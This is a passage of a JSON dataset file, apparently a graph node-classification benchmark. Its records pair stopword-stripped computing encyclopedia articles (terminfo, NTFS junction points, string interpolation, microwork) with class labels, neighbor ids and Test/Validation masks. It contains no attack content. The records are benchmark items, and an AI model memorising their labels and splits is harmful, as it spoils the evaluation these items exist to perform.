      7362,
      2859,
      9488,
      5749,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8981,
    "label": 9,
    "text": "JSLEE:jslee jslee jain service logic execution environment java programming language api developing deploying network services standardized java specification requests jsr 22 jsr 240 sun microsystems opencloud metaswitch participation 80 operators software vendors technical specification designed implementations meet stringent requirements communications applications like high throughput low latency scalability availability software portability furthermore allows software developers write robust components integrates acid properties transactions programming model jslee environment acts integration point multiple network resources communications protocols",
    "neighbors": [
      4960,
      9665,
      10048,
      7802,
      4795
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8982,
    "label": 3,
    "text": "Palm_IIIxe:palm iiixe palm iiixe discontinued palm personal digital assistant designed manufactured palm inc cost us 249 new manufacturer part number 3c80304u note requirements palm desktop pim software originally shipped palm iii xe os required apple mac os 7.5.3 later microsoft windows 95 microsoft windows 98 microsoft windows nt 4.0 later palm iiixe introduced marketplace february 2000 one two remaining models palm iiic iii series line palm personal digital assistants palm iiixe unit came black flip lid infrared port top lets users beam memos addresses etc another palm handheld personal computer right software iiixe also used universal remote control bottom unit serial port hotsyncing user desktop computer way cradle serial port also support various peripherals including palmpix camera stowaway foldable gotype keyboards like palms series bottom portion screen features silkscreen used graffiti input system provide shortcuts calculator application list application menu search unit comes seven physical buttons power/backlight date book address book scroll buttons list memo pad buttons except scroll buttons used turn unit iiixe features 16 mhz motorola 68328 ez dragonball cpu powered two aaa batteries last month two depending use also features enhanced 160x160 pixel grayscale super-twisted nematic display area palm iiie palm iiix 4-bit display 16 greyscales 8 mb ram 2 mb internal flash memory system upgrades third party applications unit shipped palm os 3.5 patched later versions palm os 3.5.2 fixed memory leak version 3.5 palm os palm os 3.5.3 fixed flow control problem dynamic ui pointer issue caused incompatibilities 3rd party applications latest version palm os runs iiixe version 4.1 released november 2001 unlike free version 3.5 updates palm os 4.1 available paid upgrade cd-rom peculiar note palm iii series top battery inserts backwards positive terminal battery contacts battery compartment spring however bottom battery inserts usual way negative terminal battery touching spring battery compartment nimh batteries used extend runtime reduce waste alkaline batteries palm iiic iiixe vx units manufactured october 1999 may 2000 dram defect could overwrite user data randomly palm released diagnostics patch correct problem",
    "neighbors": [
      2308,
      10500,
      6790,
      6797,
      3606,
      6178,
      5164,
      7983,
      3250,
      9013,
      694,
      5318,
      3017,
      11337,
      9037,
      2258,
      1621,
      4832,
      4449,
      2285,
      1776,
      2420,
      8952,
      9598
    ],
    "mask": "None"
  },
  {
    "node_id": 8983,
    "label": 8,
    "text": "Microwork:microwork microwork series small tasks together comprise large unified project completed many people internet microwork considered smallest unit work virtual assembly line often used describe tasks efficient algorithm devised require human intelligence complete reliably term developed 2008 leila chirayath janah samasource microtasking process splitting large job small tasks distributed internet many people since inception microwork many online services developed specialize different types microtasking rely large voluntary workforce composed internet users around world typical tasks offered repetitive simple automated good candidates microtasks following characteristics may also known ubiquitous human computing human-based computation focused computational tasks complex distributed computing microtasks distinguished macrotasks typically done independently require fixed amount time require specialized skill wage paid range cents per task hundreds dollars per project amazon mechanical turk allows workers choose perform simple tasks online reporting directly platform receive payments exchange task complex algorithm writing simple labelling photos videos describing products transcribing scanned documents employers submit tasks set payments often pennies task crowdsourcing project initiated amazon way users find duplicate webpages soon became service individuals contract computer programmers individuals finish tasks computers unable accomplish since project expanded original form nowadays people complete various mechanical turk projects extra income side liveops uses distributed network people run cloud call center virtual call center contact center contracted workers answer calls provide call center facilities without need physical building equipment traditional call center red cross utilized system successfully hurricane katrina 2005 process 17,000+ calls without open hire staff call center similar model used text message question-answering services like 63336 researchers connect service home receive questions submitted innocentive allows businesses post problems offer payment answers questions often far less simple tasks posted services like mechanical turk payments accordingly higher example think find way prevent orange juice stored see-through bottles turning brown may 20,000 samasource non-profit organization allows people living poverty opportunity complete microwork living wage service specializes online content moderation digital transcription data gathering promotion galaxy zoo scientific effort use online crowdsourcing classify large number galaxies astronomical images 2010 company internet eyes launched service return potential reward home viewers would watch live cctv streams alert shop owners potential theft progress uses microtasking services involve processing data especially online include driving traffic websites gathering data like email addresses labelling tagging data online also used accurately translate transcribe audio clips pictures since activities better suited humans computers used practical data conversion purposes also improve upon test fidelity machine learning algorithms identification pictures humans used help missing persons searches though little effect manipulation data services also good platform reaching large population social studies surveys since make easy offer monetary incentives companies also outsource projects specialists otherwise would expended resources hiring screening method pay per task attractive employers therefore companies like microsoft yahoo currently crowdsourcing work crowdflower company specializes allocating jobs foreign local crowd workers crowdflower alone completed 450 million completed human intelligence tasks 2007 2012 crowdflower operates differently amazon mechanical turk jobs taken company turn allocated right workers range channels implemented system called virtual play allows users play free games would turn accomplish useful tasks company 2011 estimated 375 million contributed digital crowdsourced labour india united states together make roughly 92 workers amazon mechanical turk u.s. making 56 however percentage indian turkers quadrupled one year 2008 2009 2009 indian turkers much younger educated american counterparts citation needed average age indian workers 26 american workers 35 addition 45 digital workforce india bachelor degrees 21 master degrees contrast 38 american turkers bachelor degree 17 master degree nonetheless majority digital workforce educated young adults major difference american indian workforce lies gender 63 indian turkers male compared 37 makes american turkers microtasking services implemented allow workers work home workers complete tasks voluntary basis time-sensitive jobs like call centers choose jobs complete complete workers work anywhere world receive payment directly internet workers reside anywhere world microwork provide job opportunities large fortune 500 companies many smaller companies people living poverty would otherwise able make living wage services like samasource work wealth distributed companies developed countries large volume families poverty especially women youth would otherwise able generate income services like amazon mechanical turk restrict countries workers connect employers microtasking services provide platform quickly get project online start receiving results many workers time services offer large workforces complete tasks concurrently large volumes small tasks completed quickly furthermore since task discretely contained tasks usually simple nature individual worker fully trained complete knowledge project contribute work united states tax law workers treated independent contractors means employers withhold taxes need file form 1099-misc internal revenue service given worker earns 600 per year workers responsible paying income taxes including self-employment tax would otherwise paid employer microtasking services criticized providing healthcare retirement benefits sick pay minimum wage pay piece treat workers independent contractors rather employees also avoid laws child labor labor rights additionally workers may little idea work used result may workers end contributing project negative impact morally opposed services especially amazon mechanical turk services pay pennies task called digital sweatshops analogy sweatshops manufacturing industry exploit workers maintain poor conditions wages vary considerably depending speed worker per-piece price offered workers choose tasks complete based task price experience employer employers bid higher faster completion higher-quality workers average unskilled turkers earn less 2.00 hour minimum wage united states however india well minimum cities india 1200 minimum wages global services outsource work underdeveloped developing regions competitive pricing task completion could result lower wages possibility also exists true brick mortar sweatshops exploit microtasking services enlisting poor afford computer aggregating work wages also possibility requesters may tell worker reject work cheat worker using anyway avoid paying however dispersed geography microwork used keep wages low networks fragment labour process also used workers organising resistance san francisco-based company crowdflower facilitated outsourcing digital tasks countries poverty stimulate local economies crowdsourcing company partnership samasource non-profit organization brings computer based work developing countries currently outsourced millions repetitive microwork kenyan refugee camps workers make 2 hour locals average refugees asked exploitation lukas biewald crowdflower argues digital sweatshop much better job people developing world opposed working manufacturing sweatshop states treatment received workers far superior categorized sweatshop great thing digital work really hard make sweatshop digital work really hard force someone work ca n't beat someone computer screen",
    "neighbors": [
      3688,
      1001,
      8735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8984,
    "label": 1,
    "text": "Terminfo:terminfo terminfo library database enables programs use display terminals device-independent manner mark horton implemented first terminfo library 1981–1982 improvement termcap improvements include terminfo included unix system v release 2 soon became preferred form terminal descriptions system v rather termcap bsd continued use imitated pcurses 1982–1984 pavel curtis available unix implementations adapting incorporating fixes mark horton information refer posting comp.sources.unix newsgroup december 1986 terminfo database describe capabilities hundreds different display terminals allows external programs able character-based display output independent type terminal configurations terminfo databases consist one descriptions terminals description must contain canonical name terminal may also contain one aliases name terminal canonical name aliases keys library searches terminfo database description contains one capabilities conventional names capabilities typed boolean numeric string terminfo library predetermined types capability name checks types capability syntax applications use terminfo know types respective capabilities obtain values capabilities terminfo database using library calls return successfully capability name corresponds one predefined typed capabilities like termcap string capabilities represent escape sequences may sent host pressing special keys keyboard capabilities represent strings may sent application terminal latter case terminfo library functions termcap library substituting application parameters string sent functions provide stack-based expression parser primarily used help minimize number characters sent control sequences optional parameters sgr select graphic rendition contrast termcap libraries provide limited set operations useful terminals terminfo descriptions constructed including contents one description another suppressing capabilities included description overriding adding capabilities matter storage model used terminfo library returns terminal description requested description using data compiled using standalone tool e.g. tic terminfo data stored binary file making less simple modify termcap data retrieved terminfo library files stored data organized tables boolean numeric string capabilities respectively scheme devised mark horton except differences regarding available names used terminfo implementations x/open specify format compiled terminal description fact even mention common tic infocmp utilities compiled terminfo entries contain metadata identifying indices within tables capability assigned necessarily compatible implementations however since implementations use overall table structure including sizes header data items possible automatically construct customized terminfo libraries read data given implementation example ncurses built match terminfo data several implementations original common implementation terminfo library retrieves data directory hierarchy using first character name terminal description one component pathname name terminal description name file retrieve terminfo library usually outperforms searching large termcap file implementations terminfo store terminal description hashed database e.g. something like berkeley db version 1.85 store two types records aliases point canonical entry canonical entry contains data terminal capabilities open group documents limits terminfo minimum guaranteed values apply source file two special interest 14-character limit addresses old filesystems could represent filenames longer filesystems generally obsolete limits documented late 1980s unreviewed since 32,767 limit positive values signed two complement 16-bit value terminfo entry may use negative numbers represent cancelled absent values unlike termcap terminfo source compiled representation limits compiled representation unspecified however implementations note documentation tic terminal information compiler compiled entries exceed 4,096 bytes size",
    "neighbors": [
      6213,
      9067,
      8975,
      2995,
      2804,
      2901,
      7188,
      1594,
      9054
    ],
    "mask": "Test"
  },
  {
    "node_id": 8985,
    "label": 3,
    "text": "Microsoft_Diagnostics:microsoft diagnostics msd microsoft diagnostics software tool developed microsoft assist diagnostics 1990s-era computers users primarily deployed tool provide detailed technical information user software hardware print gathered information usually use support technicians troubleshooting resolving problems assumptions made program valid late 1990s handle plug-and-play usb new technologies appeared around 2000 pc dos 6.1 codice_1 provides similar functionality commercial alternatives include manifest codice_2 quarterdeck qemm codice_3 first shipped microsoft word windows later included windows 3 ms-dos 6 windows 9x cd-roms os/2 windows nt contain code forked dos dos 5 level versions codice_3 included correspond era i.e version 2.0 windows nt 3 4 codice_5 program similar features however dos/windows specific functions replaced similar windows nt concerns codice_6 included resource kits provides print functionality codice_3 codice_5 since nt 5 windows 2000 codice_9 loader codice_10 users generally started program dos command prompt using command codice_11 starting program dos window either windows os/2 shows dos details allocated dos session machine general aspects system codice_3 provided technical information microsoft replaced codice_3 codice_10 similar features targets recent machines first appeared ms-word later distributed plus windows 95 windows 98. codice_10 windows xp stores system history wmi xml files codice_16 interest backward compatibility codice_5 became loader codice_18",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      3323,
      1791,
      11519,
      3856,
      8976,
      3351,
      8473,
      11546,
      8988,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      9525,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      9166,
      3535,
      8659,
      1498,
      5594,
      1501,
      478,
      479,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 8986,
    "label": 7,
    "text": "Jelastic:jelastic jelastic cloud services provider combines paas platform service caas container service single package hosting providers telecommunication companies enterprises developers platform available public cloud 60 data centers worldwide private cloud virtual premise hybrid multicloud jelastic provides support java php ruby node.js python .net go environments custom docker containers jelastic founded 2011 public cloud initially paas specifically targeted java hosting 2012 company got java duke choice award 2013-2015 platform added support php ruby python node.js .net support docker containers latest runtime addition 2017 integrating golang 2014 introduced private cloud solution 2015 platform could already used hybrid multi-cloud jelastic closed set funding rounds runa capital almaz capital partners foresight ventures maxfield capital june 2013 jelastic announced hiring mark zbikowski former microsoft architect contributor ms-dos senior adviser july 2013 rasmus lerdorf creator php joined jelastic senior adviser november 2014 creator java programming language james gosling brazilian java man bruno souza joined jelastic team jelastic keeps working improvement java technology user experience thereby 2018 platform proved leading position direction getting duke choice award second time platform installed bare metal iaas public cloud vpc private on-premise hybrid multi-cloud jelastic paas installed fully configured jelastic ops team performed automatically top google cloud ms azure well top bare metal using iso image platform configuration includes integration billing systems like whmcs odin system automation cleverbridge custom billing required jelastic provides pay-as-you-use pricing model within public cloud resources charged hourly base ram cpu cloudlet resource unit disk space external traffic public ip ssl price resource unit depends chosen hosting provider estimated monthly daily hourly base within dev panel cloud hosting expenses tracked optimized using built-in billing details whole account specific application private cloud installation charged monthly license base per physical server two types licensing installation self-administering installation managed services partnership service providers built franchise model revenue sharing jelastic installed wide range hosting providers telcos among datacenter finland telecom italia eapps locaweb primetel layershift elastx innofield others also jelastic used system integrators companies different spheres finance software sport gaming etc like fa solutions international football association board gmv g5 games miele philips lighting others",
    "neighbors": [
      1539,
      526,
      4623,
      10265,
      9245,
      5662,
      5666,
      9766,
      39,
      5159,
      5677,
      3121,
      5681,
      10820,
      4683,
      590,
      1102,
      7248,
      5202,
      4194,
      5732,
      2170,
      4236,
      10893,
      7317,
      6307,
      2217,
      9906,
      7352,
      4289,
      6338,
      3269,
      1224,
      5848,
      6367,
      2795,
      3819,
      253,
      8446,
      8451,
      6918,
      272,
      2328,
      4377,
      11038,
      6444,
      8495,
      11070,
      8515,
      2372,
      8520,
      4429,
      1362,
      1363,
      7512,
      2910,
      865,
      3428,
      8554,
      10090,
      8044,
      7022,
      5499,
      11646,
      6018,
      6027,
      911,
      1935,
      8592,
      405,
      2965,
      1435,
      10681,
      448,
      2496,
      11201,
      9682,
      467,
      10200,
      6618,
      6632,
      1001,
      7660,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 8987,
    "label": 9,
    "text": "Richard_H._Lathwell:richard h. lathwell richard dick henry lathwell 1973 recipient larry breed roger moore grace murray hopper award association computing machinery",
    "neighbors": [
      9993,
      10008,
      1178,
      667,
      1316,
      10668,
      4921,
      9019,
      3267,
      1099,
      1613,
      7630,
      1236,
      2519,
      1883,
      11099,
      9825,
      11625,
      4331,
      2670,
      2798,
      8695,
      505,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 8988,
    "label": 6,
    "text": "NTFS_junction_point:ntfs junction point ntfs junction point symbolic link directory acts alias directory feature ntfs file system offers benefits windows shell shortcut .lnk file allowing access files within directory via windows explorer command prompt etc unlike ntfs symbolic links junction points link absolute path local volume junction points local volume remote share unsupported junction points type ntfs reparse point internally represented mount point introduced ntfs 3.0 default file system windows 2000 windows 2000 windows 2003 resource kits include program called create junction points mark russinovich winternals released tool called junction provided complete functionality windows xp includes fsutil masatoshi kimura released filter driver soft/symbolic link functionality existing windows xp ntfs version accessible end user windows vista windows server 2008 later operating systems include mklink command-line utility creating junction points setting junction point points directory containing particular version piece software may possible add another version software redirect junction point point version desired contents junction use almost disk space simply point original directory need multiple points entry large directory junction points serve purpose well junction points confused copy something junctions simply point original directories need modified separately junction used provide distinct copy directory files within since reinstalling windows installing new version often requires deleting contents c drive advantageous create multiple partitions one partition needs deleted installation however programs n't let user choose installation directory install files c drive even installed different drive creating junction point program tricked installing different directory list junctions present current directory obtained elevated command prompt admin executing codice_1 list junctions present disk volume executing codice_2 c volume scan junction point created vista later delete vista later use junction point created xp installing server 2003 resource kit delete xp use neither windows nt startup process windows vista startup process support junction points impossible redirect certain system folders however possible redirect non-critical folders creating junctions \\users \\programdata pointing another drive recommended breaks updates windows store apps creating junctions \\users \\programdata \\program files \\program files x86 pointing locations breaks installation resp upgrade windows creating junctions \\program files \\program files x86 pointing another drive breaks windows component based servicing hardlinks files repository \\windows\\sxs installation directory",
    "neighbors": [
      11270,
      2568,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      5158,
      1577,
      10281,
      52,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      9840,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      6813,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      1193,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      6358,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3330,
      3856,
      3351,
      8473,
      8985,
      11546,
      9505,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      9533,
      3394,
      6476,
      5969,
      3922,
      4439,
      5975,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      7540,
      9593,
      2943,
      2432,
      1412,
      1418,
      5003,
      5004,
      5514,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      3522,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      1509,
      6637,
      6126,
      7663,
      9709,
      6641,
      3571,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8989,
    "label": 5,
    "text": "Frame_check_sequence:frame check sequence frame check sequence fcs refers error-detecting code added frame communications protocol frames used send payload data source destination frames bits bytes fields contained within susceptible errors variety sources fcs field contains number calculated source node based data frame number added end frame sent destination node receives frame fcs number recalculated compared fcs number included frame two numbers different error assumed frame discarded fcs provides error detection error recovery must performed separate means ethernet example specifies damaged frame discarded specify action cause frame retransmitted protocols notably transmission control protocol tcp notice data loss initiate retransmission error recovery fcs often transmitted way receiver compute running sum entire frame together trailing fcs expecting see fixed result zero correct ethernet ieee 802 protocols fixed result also known magic number crc32 residue 0xc704dd7b transmitted used way fcs generally appears immediately frame-ending delimiter far popular fcs algorithm cyclic redundancy check crc used ethernet ieee 802 protocols 32 bits x.25 16 32 bits hdlc 16 32 bits frame relay 16 bits point-to-point protocol ppp 16 32 bits data link layer protocols protocols internet protocol suite tend use checksums",
    "neighbors": [
      2912,
      10947,
      1893,
      3847,
      11321,
      4202,
      10924,
      7855,
      8432,
      6834,
      7478,
      7865,
      5531,
      4543
    ],
    "mask": "Test"
  },
  {
    "node_id": 8990,
    "label": 9,
    "text": "String_interpolation:string interpolation computer programming string interpolation variable interpolation variable substitution variable expansion process evaluating string literal containing one placeholders yielding result placeholders replaced corresponding values form simple template processing formal terms form quasi-quotation logic substitution interpretation string interpolation allows easier intuitive string formatting content-specification compared string concatenation string interpolation common many programming languages make heavy use string representations data apache groovy kotlin perl php python ruby scala swift tcl unix shells two modes literal expression usually offered one interpolation enabled without termed raw string placeholders usually represented bare named sigil typically codice_1 codice_2 e.g codice_3 codice_4 expansion string usually occurs run time languages offer string interpolation instead offering standard function one parameter printf format string provide values placeholder ruby uses codice_5 symbol interpolation allows interpolating expression variables languages may support advanced interpolation special formatting function codice_6 first argument format specifies pattern remaining arguments substituted two main types expand variable algorithms variable interpolation string interpolation like string concatenation may lead security problems user input data improperly escaped filtered system exposed sql injection script injection xml external entity injection xxe cross-site scripting xss attacks sql injection example codice_7 replaced codice_8 executing query wipe data table following perl code works identically php produces output codice_9 output output output coldfusion markup language cfml script syntax tag syntax output output output groovy interpolated strings known gstrings output output java support direct string interpolation versions 5 static method codice_10 used interpolation javascript ecmascript 2015 es6 standard supports string interpolation using backticks codice_11 feature called template literals example output output also supports advanced formatting features output output output output output output rust provides string interpolation via std :fmt module interfaced various macros format write print macros converted rust source code compile-time whereby argument interacts formatter formatter supports positional parameters named parameters argument types defining various formatting traits let apples bananas 4 3 println apples bananas apples bananas output scala 2.10+ implemented following string interpolators f raw also possible write custom ones override standard ones f interpolator compiler macro rewrites format string embedded expressions invocation string.format verifies format string well-formed well-typed scala 2.10+ string interpolation allows embedding variable references directly processed string literals example output sciter function name starting considered interpolating function interpolation customizable context sensitive gets compiled swift new string value created mix constants variables literals expressions including values inside string literal item inserted string literal wrapped pair parentheses prefixed backslash output tool command language always supported string interpolation quote-delimited strings output order actually format simply replace values formatting function version 1.4 typescript supports string interpolation using backticks codice_11 example output codice_13 function used codice_6 function example rewritten thusly output remains visual basic 14 string interpolation supported visual basic print hello tom",
    "neighbors": [
      899,
      3462,
      8582,
      8854,
      4507,
      9245,
      5677,
      11442,
      1203,
      692,
      6074,
      6335,
      8644,
      8262,
      7889,
      6228,
      6497,
      4198,
      8554,
      10991,
      3705,
      7292
    ],
    "mask": "Test"
  },
  {
    "node_id": 8991,
    "label": 2,
    "text": "CB_UNIX:cb unix columbus unix cb unix discontinued variant unix operating system used internally bell labs administrative databases transaction processing developed columbus ohio branch based v6 v7 pwb unix little-known outside company cb unix developed address deficiencies inherent research unix notably lack interprocess communication ipc file locking considered essential database management system several bell system operation support system products based cb unix switching control center system primary innovations power-fail restart line disciplines terminal types ipc features interprocess communication features developed cb unix message queues semaphores shared memory support eventually appeared mainstream unix systems starting system v 1983 collectively known system v ipc",
    "neighbors": [
      6787,
      6412,
      2322,
      5397,
      1304,
      3487,
      3488,
      7460,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      9151,
      10436,
      8262,
      2132,
      2521,
      6369,
      9444,
      5992,
      2035,
      5492,
      2424,
      633,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8992,
    "label": 7,
    "text": "OpenMosix:openmosix openmosix free cluster management system provided single-system image ssi capabilities e.g automatic work distribution among nodes allowed program processes threads migrate machines node network would able run process faster process migration particularly useful running parallel applications low moderate input/output i/o released linux kernel patch also available specialized live cds openmosix development halted developers linuxpmi project continuing development former openmosix code openmosix originally forked mosix moshe bar february 10 2002 mosix became proprietary software openmosix considered stable linux kernel 2.4.x x86 architecture porting linux 2.6 kernel remained alpha stage support 64-bit amd64 architecture started 2.6 version july 15 2007 bar announced openmosix project would reach end life march 1 2008 due decreasing need ssi clustering low-cost multi-core processors increase availability openmosix used distributed gentoo linux kernel choice removed gentoo linux portage tree february 2007 march 1 2008 openmosix read-only source code still hosted sourceforge linuxpmi project continuing development former openmosix code clusterknoppix specialized linux distribution based knoppix distribution uses openmosix kernel traditionally clustered computing could achieved setting individual rsh keys creating nfs shares editing host files setting static ips applying kernel patches manually clusterknoppix effectively renders work unnecessary distribution contains autoconfiguration system new clusterknoppix-running computers attached network automatically join cluster clusterknoppix modified knoppix distro using openmosix kernel linux live cds openmosix include",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      4887,
      10394,
      10016,
      673,
      3745,
      10530,
      9253,
      10149,
      4775,
      11305,
      7854,
      2738,
      10675,
      11001,
      4790,
      823,
      439,
      56,
      59,
      3903,
      4673,
      8901,
      2375,
      4039,
      4423,
      330,
      5067,
      8907,
      1110,
      3801,
      9693,
      8033,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      499,
      5363,
      9461,
      118,
      6393,
      3066,
      11388,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 8993,
    "label": 9,
    "text": "Mike_McMahon_(computer_scientist):mike mcmahon computer scientist mike mcmahon programmer mit computer science artificial intelligence laboratory 1970s worked richard stallman emacs also wrote eine first implementation emacs lisp machines daniel weinreb eine stands eine emacs eine later became zwei meaning zwei eine initially one founders symbolics inc. company developing selling lisp machines 1980s 1990s mike mcmahon co-developed new error system symbolics main inspiration common lisp condition system mike mcmahon designed implemented new window system mit lisp machine 1980 together howard cannon window system implemented using flavors object-oriented extension lisp machine lisp",
    "neighbors": [
      11495,
      7880,
      9864,
      8778,
      2062,
      5360,
      2166,
      10104,
      3675,
      5694
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8994,
    "label": 8,
    "text": "Oracle_iPlanet_Web_Server:oracle iplanet web server oracle iplanet web server oiws web server designed medium large business applications oracle iplanet web server builds earlier sun java system web server sun one web server iplanet web server netscape enterprise server products oracle iplanet web server available solaris windows hp-ux aix gnu/linux supports jsp java servlet technologies php nsapi cgi coldfusion netscape enterprise server web server developed originally netscape communications corporation 1996 based 1994 release netsite product renamed sun java system web server reflecting product acquisition sun microsystems oracle acquired sun 2010 oracle iplanet web server january 2009 sun open sourced core components sun java system web server 7.0 bsd license open web server open source version kept sync commercial releases january 2010 7.0 update 8 since oracle acquisition sun open source releases 2010 oracle renamed product sun java system web server oracle iplanet web server although documentation links still process updated reflect",
    "neighbors": [
      1539,
      9731,
      9229,
      7695,
      1556,
      2596,
      10789,
      44,
      5677,
      10800,
      1594,
      6714,
      10815,
      9281,
      595,
      597,
      4189,
      11363,
      10340,
      9320,
      11376,
      9333,
      4728,
      11386,
      9343,
      6791,
      4233,
      4235,
      6797,
      2710,
      8350,
      8353,
      3746,
      3237,
      8871,
      7338,
      1707,
      9387,
      3247,
      11439,
      6322,
      6338,
      10436,
      6341,
      1755,
      225,
      1250,
      9955,
      4837,
      6379,
      2287,
      9455,
      8434,
      3328,
      7430,
      1801,
      1809,
      7443,
      1304,
      7455,
      7457,
      8994,
      1316,
      7983,
      9010,
      9012,
      823,
      10553,
      2895,
      1363,
      1367,
      4439,
      4960,
      865,
      2404,
      11626,
      9580,
      7022,
      10611,
      1399,
      3966,
      10622,
      1920,
      11134,
      4485,
      7567,
      1937,
      11682,
      9125,
      2485,
      5048,
      7104,
      9665,
      8644,
      1991,
      1480,
      11221,
      10200,
      3545,
      6107,
      10722,
      488,
      3560,
      5612,
      7148,
      494,
      8179,
      8691,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8995,
    "label": 5,
    "text": "Distributed_Codec_Engine:distributed codec engine distributed codec engine dce api implementation software library libdce texas instruments library released revised bsd license additional terms enables provides remote access hardware acceleration audio video decoding iva-hd omap4-based platforms via syslink/rcm shim layer accessing omap codec engine api codec interface co-processor ducati/m3 host linux without needing openmax ducati sub system comprises two arm cortex-m3 processors cpus asics iva-hd iss uses custom vanity license use established free open source software license",
    "neighbors": [
      1377,
      10658,
      9320,
      1770,
      1644,
      6797,
      7309,
      7983,
      2804,
      5397,
      8438,
      823,
      11485,
      508,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8996,
    "label": 9,
    "text": "Event_bubbling:event bubbling event bubbling type event propagation event first triggers innermost target element successively triggers ancestors parents target element nesting hierarchy till reaches outermost dom element document object provided handler initialized one way events handled browser events actions done user button click changing field etc event handlers used perform methods according event occurred e.g steps need done button clicked webpage completes loading etc consider dom structure 3 elements nested following order element 1 div element 2 span element 3 button whose on-click handlers handler1 handler2 handler3 respectively button clicked event handler element 3 triggered first event bubbles handler immediate parent element element 2 called followed handler element 1 till reaches outermost dom element event handling order handler3 handler2 handler1 innermost element event triggered called target element browsers consider event bubbling default way event propagation however another approach event propagation known event capturing direct opposite event bubbling event handling starts outermost element document dom structure goes way target element executing target element handler last order event handlers consider event bubbling default way event handling user manually select way propagation specifying last parameter addeventlistener element javascript capturemode false event handled using event bubbling capturemode true event handled using event capturing user ’ specify value capturemode argument default considered event bubbling.most browser support event bubbling event capturing except ie 9 opera 7.0 support event capturing javascript also provides event property called bubbles check whether event bubbling event returns boolean value true false depending whether event bubble parent elements dom structure isbubblepossible true event bubble ancestors isbubblepossible false event bubble handle cases one event one handler event bubbling concept implemented.the major use event bubbling registration default functions present program recent times many developers use event capturing bubbling particular necessary implement event bubbling may become complicated users keep track actions getting executed event since browsers default support event bubbling sometimes useful stop event bubbling user might get confused single trigger one element lead multiple triggers ancestors simple individual requirement user wants one event one element another another bubbling event necessity stop event bubbling user use following approaches 1 stoppropagation method stops propagation particular event parents invoking event handler target element although supported w3c compliant browsers method ’ work internet explorer version 9 lesser ie 9 stop bubbling using following code w3c compliant browsers 2 stopimmediatepropagation method stop propagation also stops handler target event executing dom multiple handlers event independent stopping execution one event handler generally ’ affect handlers target stopimmediatepropagation method prevents execution handler target w3c compliant browsers another approach stop event bubbling cancelling event preventdefault return false .but prevents target handler execution well therefore advisable use aim prevent event bubbling user still wants actions associated target element",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8997,
    "label": 4,
    "text": "Factory_reset:factory reset factory reset also known master reset software restore electronic device original system state erasing information stored device attempt restore device original manufacturer settings effectively erase data settings applications previously device often done fix issue device could also done restore device original settings electronic devices include smartphones since factory reset entails deleting information stored device essentially concept reformatting hard drive pre-installed applications data card storage card microsd card erased factory reset performed caution effectively destroys data stored unit factory resets fix many chronic performance issues freezing remove device operating system factory resets achieved variety ways depending electronic device devices could done going device service menu devices may require complete re-installation software following section lists common electronic devices factory reset computer factory resets restore computer computer original operating system delete user data stored computer microsoft windows 8 windows 10 apple macos options android devices factory data reset option settings appear erase device data reset settings method typically used device issue fixed using methods owner wants destroy personal data selling device performing study avast reported data recoverable using fairly generic publicly available forensics software factory data reset option effect knox flag reset device original factory settings way return device state compatible manufacturer warranty data sim card microsd card erased device modded custom recovery twrp able custom install custom roms sure back data well stock rom necessary many devices restored factory settings like televisions gps units tablets many electronic devices menu tools settings called service menu service menu commonly includes tool performs factory reset tool common devices displays television sets computer monitors menus usually accessed sequence button presses",
    "neighbors": [
      1475,
      3972,
      11140,
      2534,
      5000,
      7369,
      11368,
      5261,
      7983,
      11695,
      7090,
      9086,
      10195,
      7544,
      1083,
      6494,
      831
    ],
    "mask": "Test"
  },
  {
    "node_id": 8998,
    "label": 4,
